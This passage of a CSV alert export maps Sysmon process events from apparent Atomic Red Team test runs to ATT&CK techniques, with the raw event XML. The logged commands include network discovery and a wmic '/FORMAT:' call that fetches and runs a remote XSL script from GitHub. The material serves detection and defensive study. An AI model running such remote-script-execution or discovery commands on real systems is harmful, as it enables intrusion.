<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:22.314203Z"">
</TimeCreated>
<EventRecordID>3770</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:22.302</Data>
<Data Name=""ProcessGuid"">747F3D96-D8EA-5D31-0000-001030B63300</Data>
<Data Name=""ProcessId"">1988</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Process - Created,1563547882.314203,2019-07-19T18:51:22.314203+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view /domain ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:09.845415Z"">
</TimeCreated>
<EventRecordID>3769</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:09.839</Data>
<Data Name=""ProcessGuid"">747F3D96-D8DD-5D31-0000-001043953300</Data>
<Data Name=""ProcessId"">3012</Data>
<Data Name=""Image"">C:\Windows\System32\net.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Net Command</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">net view /domain</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8DD-5D31-0000-0010EF923300</Data>
<Data Name=""ParentProcessId"">4856</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view /domain&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1018] Remote System Discovery - Process,1563547882.314203,2019-07-19T18:51:22.314203+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view /domain ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:09.845415Z"">
</TimeCreated>
<EventRecordID>3769</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:09.839</Data>
<Data Name=""ProcessGuid"">747F3D96-D8DD-5D31-0000-001043953300</Data>
<Data Name=""ProcessId"">3012</Data>
<Data Name=""Image"">C:\Windows\System32\net.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Net Command</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">net view /domain</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8DD-5D31-0000-0010EF923300</Data>
<Data Name=""ParentProcessId"">4856</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view /domain&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547869.845415,2019-07-19T18:51:09.845415+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view /domain&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:09.823311Z"">
</TimeCreated>
<EventRecordID>3768</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:09.804</Data>
<Data Name=""ProcessGuid"">747F3D96-D8DD-5D31-0000-0010EF923300</Data>
<Data Name=""ProcessId"">4856</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view /domain&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547869.823311,2019-07-19T18:51:09.823311+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:06.888030Z"">
</TimeCreated>
<EventRecordID>3767</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:06.873</Data>
<Data Name=""ProcessGuid"">747F3D96-D8DA-5D31-0000-00100D8A3300</Data>
<Data Name=""ProcessId"">4016</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1563547866.88803,2019-07-19T18:51:06.888030+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:06.753240Z"">
</TimeCreated>
<EventRecordID>3766</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:06.748</Data>
<Data Name=""ProcessGuid"">747F3D96-D8DA-5D31-0000-001029863300</Data>
<Data Name=""ProcessId"">3220</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">WMI Commandline Utility</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8DA-5D31-0000-0010D3833300</Data>
<Data Name=""ParentProcessId"">5340</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547866.75324,2019-07-19T18:51:06.753240+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:06.728089Z"">
</TimeCreated>
<EventRecordID>3765</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:06.714</Data>
<Data Name=""ProcessGuid"">747F3D96-D8DA-5D31-0000-0010D3833300</Data>
<Data Name=""ProcessId"">5340</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1563547866.75324,2019-07-19T18:51:06.753240+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:06.728089Z"">
</TimeCreated>
<EventRecordID>3765</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:06.714</Data>
<Data Name=""ProcessGuid"">747F3D96-D8DA-5D31-0000-0010D3833300</Data>
<Data Name=""ProcessId"">5340</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1603194656.569246,2020-10-20T15:50:56.569246+04:00,,Threat,Low,Found User (DESKTOP-NTSSLJD\den) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-20T11:50:56.569102Z"">
</TimeCreated>
<EventRecordID>988</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""7212"" ThreadID=""9748"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>DESKTOP-NTSSLJD</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1059.003,technique_name=Windows Command Shell</Data>
<Data Name=""UtcTime"">2020-10-20 11:50:56.472</Data>
<Data Name=""ProcessGuid"">23F38D93-CF20-5F8E-D008-000000000C00</Data>
<Data Name=""ProcessId"">9620</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">DESKTOP-NTSSLJD\den</Data>
<Data Name=""LogonGuid"">23F38D93-AE9B-5F8E-A2EC-170000000000</Data>
<Data Name=""LogonId"">0x17eca2</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">23F38D93-CF20-5F8E-CE08-000000000C00</Data>
<Data Name=""ParentProcessId"">6896</Data>
<Data Name=""ParentImage"">C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe</Data>
<Data Name=""ParentCommandLine"">C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe</Data>
</EventData>
</Event>",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547866.728089,2019-07-19T18:51:06.728089+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:56.182990Z"">
</TimeCreated>
<EventRecordID>3764</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:56.162</Data>
<Data Name=""ProcessGuid"">747F3D96-D8D0-5D31-0000-001034673300</Data>
<Data Name=""ProcessId"">396</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1563547856.18299,2019-07-19T18:50:56.182990+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic.exe process /FORMAT:list ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:56.047770Z"">
</TimeCreated>
<EventRecordID>3763</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:56.021</Data>
<Data Name=""ProcessGuid"">747F3D96-D8D0-5D31-0000-0010F3623300</Data>
<Data Name=""ProcessId"">7040</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">WMI Commandline Utility</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">wmic.exe process /FORMAT:list</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E</Data>
